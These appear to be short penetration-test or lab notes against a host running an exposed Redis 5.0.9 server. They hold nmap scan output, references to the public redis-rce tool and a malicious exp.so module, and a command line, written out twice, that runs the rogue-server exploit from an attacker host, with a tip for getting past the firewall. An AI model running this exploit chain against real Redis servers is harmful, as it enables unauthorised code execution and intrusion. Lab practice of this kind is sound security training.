PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http syn-ack ttl 61 nginx 1.10.3
6379/tcp open redis syn-ack ttl 61 Redis key-value store 5.0.9
8080/tcp open http-proxy syn-ack ttl 61
27017/tcp open mongodb syn-ack ttl 61 MongoDB 4.0.18
python3 redis-rce.py -r 192.168.237.69 -L 192.168.45.192 -P 80 -f exp.so
(Note: Must assign -P as 80 or 6379, otherwise, the traffice would be blocked by firewall)
80, 8080/port --> didn't find useful info...
searchsploit nginx 1.10 / MongoDB 4.0 / Redis --> No info google them --> Redis 5.0.9 exploit --> https://github.com/Ridter/redis-rce
Get exp.so file from URL below (The exp.so is a malicious redis module which we going to load on the target redis server. ) https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so
python3 redis-rce.py -r 192.168.237.69 -L 192.168.45.192 -P 80 -f exp.so(Note: Must assign -P as 80 or 6379, otherwise, the traffice would be blocked by firewall)